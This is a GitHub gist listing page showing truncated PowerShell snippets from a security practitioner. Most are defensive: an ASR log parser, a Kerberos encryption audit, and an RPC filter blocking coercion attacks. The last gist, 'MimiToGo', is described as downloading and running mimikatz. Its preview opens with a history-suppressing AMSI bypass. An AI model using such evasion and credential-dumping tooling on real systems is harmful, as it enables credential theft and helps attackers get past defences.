Skip to content

Instantly share code, notes, and snippets.

View cfalta's full-sized avatar

Christoph Falta cfalta

223 followers · 2 following
View GitHub Profile
@cfalta
cfalta / reset-pw.ps1
Created November 22, 2022 21:04
Veeeeery crude pw reset script
function Export-UserToCsV
{
Get-ADUser -filter * -Properties *| select samaccountname,description | export-csv .\userlist.csv -NoTypeInformation
}
function Get-Password([int]$Length)
{
if($Length -gt 0)
{
$Alphabet = @("0","1","2","3","4","5","6","7","8","9",":",";","<","=",">","?","!","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","_","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z")
@cfalta
cfalta / asr-log-parser.ps1
Created October 21, 2022 19:24
Parses audit/block events from the Windows Defender Attack Surface Reduction rules into PowerShell objects for easier troubleshooting during rollout
$ASRGuidMatrix = @{'56a863a9-875e-4185-98a7-b882c64b5ce5' ='Block abuse of exploited vulnerable signed drivers';
'7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c' = 'Block Adobe Reader from creating child processes';
'd4f940ab-401b-4efc-aadc-ad5f3c50688a' = 'Block all Office applications from creating child processes';
'9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from the Windows local security authority subsystem (lsass.exe)';
'be9ba2d9-53ea-4cdc-84e5-9b1eeee46550' = 'Block executable content from email client and webmail';
'01443614-cd74-433a-b99e-2ecdc07bfc25' = 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion';
'5beb7efe-fd9a-4556-801d-275e5ffc04cc'='Block execution of potentially obfuscated scripts';
'd3e037e1-3eb8-44c8-a917-57927947596d'='Block JavaScript or VBScript from launching downloaded executable content';
'3b576869-a4ec-4529-8536-b80a7769e899'='Block Office applications from creating executable content';
'75668c1f-73b5-4cf0-bb93-3ecf5
@cfalta
cfalta / Get-LastKnownNetworks.ps1
Last active May 17, 2022 19:16
Queries the registry for the known network profiles and their last and first connection time. Useful for DFIR if you want to check when a host was last connected to a certain network.
function Get-LastKnownNetworks
{
function ConvertFrom-SystemTimeStructure
{
[CmdletBinding()]
Param (
[Parameter(ValueFromPipeline=$true)]
[ValidateNotNullOrEmpty()]
[String]
@cfalta
cfalta / Verify-KeyLink.ps1
Created March 21, 2022 20:58
@cfalta
cfalta / MSEnforcement.md
Last active April 12, 2023 08:39

Windows Updates with phased rollout

A list of updates addressed in a phased rollout (aka. enforcements) on Windows/ActiveDirectory that I am aware of. Microsoft usually chooses this approach if they know, that the final implementation of the update will likely break stuff. That's why there's always one or more inital phases that introduce new events or audit capabilities to let you check for potential impact before the final enforcement phase.

The first table is a list of update phases which are currently running. The second table is a list of once planned but then postponed enforcements (so they will reappear in the future I guess).

Active enforcements

Name CVE Initial Phases Enforcement Phase Event Log EventCodes Link
LDAP Permission changes CVE-2021-42291 Phase 1: 9.11.2021 09.01.2024 Directory Services 3050,3051,3052,30533054,3055,3047,30483049,3056,3044,30453046 https://support.microsoft.com/en-us/topic/kb5008383-active-directory-p
@cfalta
cfalta / Get-KerberosEncryptionTypes.ps1
Last active July 14, 2023 15:27
The script shows the required encryption types for all kerberoastable user accounts (== user object with spn). Every account that supports somehting else than AES will be marked as unsafe so you can filter for that.
<#
.SYNOPSIS
This is a simple script meant to help on your way towards better kerberos encryption (looking at you RC4!) with regards to kerberoasting.
It shows the required encryption types for all kerberoastable user accounts (== user object with spn). Every account that supports somehting else than AES will be marked as unsafe so you can filter for that.
Author: Christoph Falta (@cfalta)
.PARAMETER UnsafeOnly
@cfalta
cfalta / rpcfilter.txt
Created September 23, 2021 18:25
RPC filter to block petitpotam and spoolsample/printerbug. usage: netsh -f rpcfilter.txt
rpc
filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
add filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=df1941c5-fe89-4e79-bf10-463657acf44d
add filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=12345678-1234-ABCD-EF00-0123456789AB
@cfalta
cfalta / Test-Greynoise.ps1
Last active May 14, 2021 19:34
Powershell function to check an IP against the public API of Greynoise
function Test-Greynoise
{
[CmdletBinding()]
Param (
[Parameter(Mandatory = $false, ValueFromPipeline = $true)]
[ValidatePattern({\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}})]
[String]
$IP)
if(-not $IP)
@cfalta
cfalta / PSArmoury-Example.ps1
Created January 19, 2021 12:17
Explanatory example to be used with psarmoury
Write-Output "not inside function block"
function Invoke-Hello
{
Write-Output "hello from inside the function block"
}
@cfalta
cfalta / MimiToGo.ps1
Last active September 10, 2020 12:07
Download and run latest mimikatz (quick check to see if it still works after windows update)
function Disable-AMSI
{
Set-PSReadlineOption -HistorySaveStyle SaveNothing
$AMSIBypass2=@"
using System;
using System.Runtime.InteropServices;
namespace RandomNamespace
{